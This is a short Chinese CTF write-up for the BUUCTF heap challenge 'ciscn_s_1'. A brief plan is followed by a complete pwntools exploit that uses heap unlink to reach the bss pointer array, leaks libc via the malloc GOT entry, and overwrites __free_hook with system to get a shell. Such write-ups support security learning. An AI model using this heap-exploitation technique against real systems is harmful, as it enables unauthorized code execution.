一开始忘记注意bss段上的heap与key1和key2的偏移了,所以有点蒙蔽不知道怎么写,然后看了pwnki师傅博客的一点提醒,恍然大悟
思路
- 通过unlink把指针的值分配到bss段上,从而控制heap里的指针值,在然后将key2和key1修改值,为自己可用
- 接着劫持free_hook即可getshell
exp
from pwn import * #p=process('./ciscn_s_1') p=remote('node3.buuoj.cn',29220) elf=ELF('./ciscn_s_1') libc=ELF('../libc-2.27.so') context.log_level='debug' def add(idx,size,content): p.sendafter('4.show',str(1)) p.sendafter('index:',str(idx)) p.sendafter('size:',str(size)) p.sendafter('content:',content) def free(idx): p.sendafter('4.show',str(2)) p.sendafter('index:',str(idx)) def edit(idx,content): p.sendafter('4.show',str(3)) p.sendafter('index:',str(idx)) p.sendafter('content:',content) def show(idx): p.recvuntil('show') p.sendline('4') p.recvuntil('index:') p.sendline(str(idx)) heap=0x6020E0 #0x6022B8 for i in range(1,8): add(i,0xf8,'pppp') add(32,0xf8,'pppp') add(9,0xf8,'pppp') add(31,0x80,'pppp') add(30,0x80,'pppp') for i in range(1,8): free(i) edit(32,(p64(0)+p64(0xf1)+p64(heap+32*8-0x18)+p64(heap+32*8-0x10)).ljust(0xf0,b'x00')+p64(0xf0)) free(9) edit(32,(p64(elf.got['malloc'])+p64(heap+29*8)+p64(heap+29*8)+p64(heap+29*8)).ljust(0xf0,b'x00')+p32(999)+p32(999)) show(29) libc.address=u64(p.recvuntil('x7f')[-6:].ljust(8,b'x00'))-libc.symbols['malloc'] free_hook=libc.symbols['__free_hook'] system=libc.symbols['system'] print(hex(libc.address)) print(hex(free_hook)) edit(32,p64(free_hook)*4) edit(32,p64(system)) add(15,0x80,'/bin/sh') free(15) #gdb.attach(p) p.interactive()